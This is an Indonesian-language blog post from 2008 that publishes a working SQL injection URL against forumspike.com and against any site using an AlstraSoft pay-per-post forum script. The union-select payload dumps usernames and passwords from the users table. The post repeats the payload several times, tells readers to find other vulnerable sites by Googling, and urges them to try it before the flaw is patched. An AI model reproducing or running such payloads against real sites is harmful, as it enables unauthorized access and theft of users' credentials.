13 Sep 2008

Forumspike SQL Injection

SQL Injection pd situs forumspike.com

Copy paste kode dibwh ini pd browser anda:

http://forumspike.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--

atau klik disini


User ma pass keliatan


Masuk deh..
Itu bug dari produk altrasoft.com, forum pay per post exchange.

http://www.alstrasoft.com/forum-pay-per-post-exchange.htm


Dimana jika kita menemukan sebuah situs yg memakai produk altrasoft.com tersebut, kita tinggal menambahkan kode injeksi SQL:

index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
Jika kesulitan copy paste, bisa lewat klik disini

Contoh:

Anda membeli produk tsb dan memasangnya di http://www.anda-pay-per-post.com.
Maka dibelakang .com kita tinggal menambah kode diatas, menjadi:

http://anda-pay-per-post.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--

Jika kesulitan copy kode yg panjang diatas, bs liat disini

User id dan password didatabase jd nongol deh.. :)

Bagaimana cara mencari situs yg memakai produk altrasoft tsb? Googling aja.. :)

Silahkan iseng2 sebelum bug SQL ini dipatch.

0 komentar:

Label's

Blog Archive

What's up doc?



Tebak Hari Lahir

When were you born?

Powered by Blogger.

Followers


 

Design by Blogger Buster | Distributed by Blogging Tips